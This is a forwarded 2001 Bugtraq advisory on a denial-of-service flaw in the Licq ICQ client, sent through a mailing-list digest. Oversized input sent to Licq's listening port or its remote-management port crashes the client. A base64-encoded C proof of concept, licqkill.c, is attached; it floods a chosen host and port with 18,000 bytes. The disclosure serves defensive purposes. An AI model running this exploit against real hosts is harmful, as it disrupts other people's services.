[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]
(fwd) Advisory: Licq DoS +exploit
[Just when you thought it was safe to ICQ from Linux this happens...
No exploits yet, but I'm sure there'll be some coming up soon.
There's no upgrade at the moment, so keep checking the Licq site --
Raju]
This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Return-Path: <BUGTRAQ@xxxxxxxxxxxxxxxxx>
Approved-By: beng@xxxxxxxxxxxxxxxxx
Delivered-To: bugtraq@xxxxxxxxxxxxxxxxxxxxxxx
Message-ID: <Pine.GSO.4.21.0102201604400.20187-200000@xxxxxxxxxxxxxxxxxx>
Reply-To: "Stanley G. Bubrouski" <stan@xxxxxxxxxxx>
From: "Stanley G. Bubrouski" <stan@xxxxxxxxxxx>
Sender: Bugtraq List <BUGTRAQ@xxxxxxxxxxxxxxxxx>
To: BUGTRAQ@xxxxxxxxxxxxxxxxx
Subject: Advisory: Licq DoS +exploit
Date: Tue, 20 Feb 2001 16:19:36 -0500
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@xxxxxxxxxxxxxxxxxxxxxxxxxxxx for more info.
---559023410-851401618-982703976=:20187
Content-Type: TEXT/PLAIN; charset=US-ASCII
Author: Stan Bubrouski (stan@xxxxxxxxxxx)
Date: February 20, 2001
Package: Licq
Versions affected: v.85 and v1.0.2 and possibly previous or newer versions.
Severity: Remote user's can cause Licq to crash or lock up completely.
Problems: While testing Licq back in December it became apparent to me that
Licq could be made to crash consistently if a certain amount of data is
sent to a port it is listening on. Further testing showed that sending a
certain amount of data to the port the Remote Management Service (RMS)
plugin listens on it too would cause Licq to crash or lock up. The
amount of data needed to be sent to crash Licq may vary from system to
system. On the Red Hat linux 7.0 system I used 16707 or more bytes sent
to the port Licq was listening on was enough to crash it. Sending around
12000 or more characters to the RMS plugin port was enough to crash Licq
on my system as well. I've attached a simple exploit to demonstrate the
DoS. I haven't tested any versions newer than 1.0.2 but they should be
assumed vulnerable as well.
Copyright 2001 Stan Bubrouski
--
Stan Bubrouski stan@xxxxxxxxxxx
316 Huntington Ave. Apt #676, Boston, MA 02115 (617) 377-7222
---559023410-851401618-982703976=:20187
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="licqkill.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.GSO.4.21.0102201619360.20187@xxxxxxxxxxxxxxxxxx>
Content-Description:
Content-Disposition: attachment; filename="licqkill.c"
LyoNCiAqIE5hbWU6IExpY3FraWxsLmMNCiAqIEF1dGhvcjogU3RhbiBCdWJy
b3Vza2kgPHN0YW5AY2NzLm5ldS5lZHU+DQogKiBEYXRlOiBEZWNlbWJlciAy
NiwgMjAwMA0KICogRGVzY3JpcHRpb246IExpY3Egd2lsbCBjcmFzaCB3aGVu
IDE2NzA3IG9yIG1vcmUgY2hhcmFjdGVycyBhcmUgc2VudCB0byB0aGUgcG9y
dA0KICogICAgICAgICAgICAgIExpY3EgaXMgbGlzdGVuaW5nIG9uLiAgRmlu
ZGluZyB0aGUgcG9ydCBMaWNxIGlzIHJ1bm5pbmcgb24gaXMgcHJldHR5DQog
KiAgICAgICAgICAgICAgc2ltcGxlIGJlY2F1c2UgYnkgZGVmYXVsdCBpdCBz
dGFydHMgdXNpbmcgcG9ydHMgYXJvdW5kIDExMDAgb3Igc28uICBUaGlzDQog
KiAgICAgICAgICAgICAgaGFzIGJlZW4gdGVzdGVkIGFnYWluc3QgTGljcSB2
Ljg1IGFuZCB2MS4wLjINCiAqIFB1cnBvc2U6IFByb29mLW9mLWNvbmNlcHQg
dG9vbCBmb3IgdGhlIExpY3EgRGVuaWFsIG9mIFNlcnZpY2UgdnVsbmVyYWJp
bGl0eS4NCiAqLw0KDQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxu
ZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVk
ZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVk
ZSA8c3RkbGliLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8
ZXJybm8uaD4NCg0KaW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0K
ew0KCWNoYXIgYnVmWzE4MDAwXTsNCglpbnQgaSwgc29jaywgcmVzdWx0Ow0K
CXN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQoJc3RydWN0IGhvc3RlbnQgKmhu
Ow0KDQoJcHJpbnRmKCJsaWNxa2lsbC5jIC0gTGljcSByZW1vdGUgRG9TIGJ5
IFN0YW4gQnVicm91c2tpIDxzdGFuQGNjcy5uZXUuZWR1PlxuXG4iKTsNCg0K
CWlmIChhcmdjIDwgMykgDQoJew0KCQlmcHJpbnRmKHN0ZGVyciwgIlVzYWdl
OiAlcyA8aG9zdD4gPHBvcnQ+XG4iLCBhcmd2WzBdKTsNCgkJZXhpdCgtMSk7
DQoJfQ0KDQoJaG4gPSBnZXRob3N0YnluYW1lKGFyZ3ZbMV0pOw0KDQoJaWYg
KCFobikNCgl7DQoJCWZwcmludGYoc3RkZXJyLCAiJXM6IGhvc3QgbG9va3Vw
IGZhaWx1cmVcbiIsIGFyZ3ZbMV0pOw0KCQlleGl0KC0xKTsNCgl9DQoNCglz
aW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQoJc2luLnNpbl9wb3J0ID0gaHRv
bnMoYXRvaShhcmd2WzJdKSk7DQoJc2luLnNpbl9hZGRyID0gKihzdHJ1Y3Qg
aW5fYWRkciAqKWhuLT5oX2FkZHI7DQoJc29jayA9IHNvY2tldChBRl9JTkVU
LCBTT0NLX1NUUkVBTSwgMCk7DQoJcmVzdWx0ID0gY29ubmVjdChzb2NrLCAo
c3RydWN0IHNvY2thZGRyICopJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRk
cl9pbikpOw0KDQoJaWYgKHJlc3VsdCAhPSAwKSANCgl7IA0KCQlmcHJpbnRm
KHN0ZGVyciwgIkZhaWxlZCB0byBlc3RhYmxpc2ggY29ubmVjdGlvbiB0byAl
c1xuIiwgYXJndlsxXSk7DQoJCWV4aXQoLTEpOw0KCX0NCgkNCglpZiAoc29j
ayA8IDApDQoJew0KCQlmcHJpbnRmKHN0ZGVyciwgIlNvY2tldCBlcnJvci4i
KTsNCgkJZXhpdCgtMSk7DQoJfQ0KDQoJZm9yIChpPTA7IGk8MTgwMDA7IGkr
KykNCgkJc3RybmNhdChidWYsICJBIiwgMSk7DQoJc2VuZChzb2NrLCBidWYs
IHNpemVvZihidWYpLCAwKTsNCgljbG9zZShzb2NrKTsNCglmcHJpbnRmKHN0
ZG91dCwgIkRhdGEgc2VudFxuXG4iKTsNCn0NCg==
---559023410-851401618-982703976=:20187--
------------------------------
End of this Digest
******************
--
Raju Mathur raju@xxxxxxxxxxxxx http://kandalaya.org/